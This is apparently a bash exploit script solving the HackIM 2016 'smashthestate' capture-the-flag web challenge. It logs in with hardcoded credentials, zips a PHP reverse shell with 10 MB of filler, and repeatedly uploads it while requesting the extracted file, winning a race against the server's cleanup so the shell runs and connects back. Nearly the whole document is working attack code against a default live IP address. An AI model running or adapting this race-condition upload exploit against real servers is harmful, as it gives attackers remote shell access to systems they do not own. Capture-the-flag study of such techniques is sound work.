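#!/bin/bash
#
# HackIM 2016 / Web400: smashthestate
#
# Get a reverse shell by racing the upload handler. The server unzips the
# uploaded archive into tmp/upload_<PHPSESSID>/ and (by the look of the
# original loop) removes it again shortly afterwards, so a large archive is
# uploaded to widen the window and a.php is requested while the extracted
# files are still on disk. Everything is retried until the fetched page is no
# longer the 404 placeholder.
#
# Environment (all optional; defaults reproduce the original CTF setup):
#   TARGET     base URL of the challenge     (default http://54.152.101.3)
#   CTF_USER   login name                    (default rob)
#   CTF_PASS   login password                (default smashthestate)
#   PAYLOAD    PHP reverse shell to upload   (default ./rev.php, e.g.
#              http://pentestmonkey.net/tools/web-shells/php-reverse-shell;
#              its connect-back host/port must already be edited in, and this
#              script does NOT start a listener for it)
#   MAX_TRIES  stop after this many attempts; 0 = retry forever (default 0)
#
# Writes result.html, random.data, a.php and a.zip into the current directory.
#
set -euo pipefail

target=${TARGET:-http://54.152.101.3}
ctf_user=${CTF_USER:-rob}
ctf_pass=${CTF_PASS:-smashthestate}
payload=${PAYLOAD:-rev.php}
max_tries=${MAX_TRIES:-0}

die() { printf '%s\n' "$*" >&2; exit 1; }

[[ -f "$payload" ]] || die "payload not found: $payload"

# Sentinel: the loop below runs while result.html still carries the 404 title,
# so seed it with that title to guarantee at least one attempt.
printf '<title>404 Not Found</title>\n' > result.html

# Build the archive. The 10 MB zero-filled filler makes the server-side unzip
# take longer, which is what keeps the extracted a.php around long enough.
dd if=/dev/zero of=random.data bs=1k count=10000
cp -- "$payload" a.php
zip a.zip random.data a.php

# Log in and take PHPSESSID from the cookie jar curl writes to stdout (-c -);
# -o /dev/null keeps the response body out of that stream. Jar lines have
# seven tab-separated fields (domain, subdomains flag, path, secure, expiry,
# name, value), so select the cookie by name instead of assuming it is the
# last line. --data-urlencode keeps credentials with '&' or '=' intact.
phpsessid=$(curl -s -o /dev/null -c - "$target/?page=login" \
  --data-urlencode "user=$ctf_user" \
  --data-urlencode "pass=$ctf_pass" \
  | awk '$6 == "PHPSESSID" { print $7 }') || die "login request failed"
[[ -n "$phpsessid" ]] || die "login failed: no PHPSESSID cookie in response"
printf 'PHPSESSID=%s\n' "$phpsessid"

# Retry the race until the fetched page is something other than the 404.
tries=0
while grep -q '<title>404 Not Found</title>' result.html; do
  if (( max_tries > 0 && tries >= max_tries )); then
    die "giving up after $tries attempts"
  fi
  tries=$((tries + 1))
  printf .
  # Upload in the background so the fetch below overlaps the server-side
  # unzip (-F implies POST). The job is reaped by the wait after the loop.
  curl -s -F "zipfile=@a.zip" -b "PHPSESSID=$phpsessid" \
    "$target/?page=process_upload" > /dev/null &
  sleep 1
  # Request the extracted shell before the server cleans the directory. If the
  # payload is a connect-back shell this request will presumably block for as
  # long as that shell session stays open.
  curl -s "$target/tmp/upload_${phpsessid}/a.php" > result.html
done

# Reap any upload still in flight, then show what the last fetch returned.
wait
cat result.html
exit 0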